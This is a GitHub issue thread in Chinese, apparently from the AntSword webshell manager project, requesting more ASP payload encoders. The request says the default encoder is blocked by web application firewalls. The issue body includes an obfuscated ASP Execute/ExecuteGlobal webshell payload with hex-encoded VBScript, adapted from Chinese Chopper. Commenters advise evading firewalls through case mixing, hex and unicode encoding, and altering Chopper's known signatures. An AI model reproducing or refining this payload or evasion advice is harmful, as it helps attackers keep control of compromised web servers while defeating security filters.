新建议:增加asp的编码方式 #152
Labels
💪enhancement
功能增强
Comments
|
看你这个 payload, 应该是把几个关键字用 比如:
|
Medicean
referenced
this issue
Apr 19, 2019
asunescape 括号中的内容在HTTP请求时,不会进行urlEncode eg: data["key1"] = "++asunescape(@@@)++"; => "key1=%3B%3B@@@%3B%3B"
|
是的 还可以配合大小写 hex unicode编码等等 |
|
可以参考菜刀的配置文件 但是菜刀的编码特征已经被很多waf识别了 可以自己魔改一下 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
对于其他几种脚本来说其实蚁剑自带的编码器都挺好的
但是asp的仅有一种编码器并且是普通shell不能用的
default最普通的waf就会拦截
所以希望官方能够多增加几种编码方式
当然,作为用户来说可以自己写.但是这毕竟应该是大多数人的需求
如果官方能够增加编码方式的话大家用起来会更方便
其实也想自己改写,参考了一下菜刀的代码,但是对于nodejs确实不知道如何改成以下的形式
<ASP_BASE>
%%u0045%%xec%%ute%%G%%loba%%l%%%%28Replace%%28%%22Fu%%nct%%ion%%20bd%%28by%%V%%al%%20s%%29:Fo%%r%%20i%%%%3D1%%20T%%o%%20Le%%n%%28s%%29%%20S%%te%%p%%202:c%%%%3DM%%id%%28s%%2Ci%%2C2%%29:If%%20Is%%Nu%%meric%%28M%%id%%28s%%2Ci%%2C1%%29%%29%%20T%%hen:bd%%%%3Dbd%%4026%%40c%%hr%%28%%22%%22%%4026%%40H%%22%%22%%4026%%40c%%29:E%%lse:bd%%%%3Dbd%%4026%%40c%%hr%%28%%22%%22%%4026%%40H%%22%%22%%4026%%40c%%4026%%40M%%id%%28s%%2Ci%%2B2%%2C2%%29%%29:i%%%%3Di%%2B2:E%%nd%%20If:Ne%%xt:E%%nd%%20Fu%%nct%%ion:E%%xecu%%te%%%%28bd%%%%28%%22%%224F6E204572726F7220526573756D65204E6578743A526573706F6E73652E57726974652022%s223A%s3A526573706F6E73652E57726974652022%s223A526573706F6E73652E456E64%%22%%22%%29%%%%29%%22%%2C%%22%%4026%%40%%22%%2Cchr%%2838%%29%%29%%29
</ASP_BASE>
php的编码器写了不少,但是对于asp这种语言不太熟悉,所以希望官方能够推出一些编码器,或者给一些指点,感谢!
The text was updated successfully, but these errors were encountered: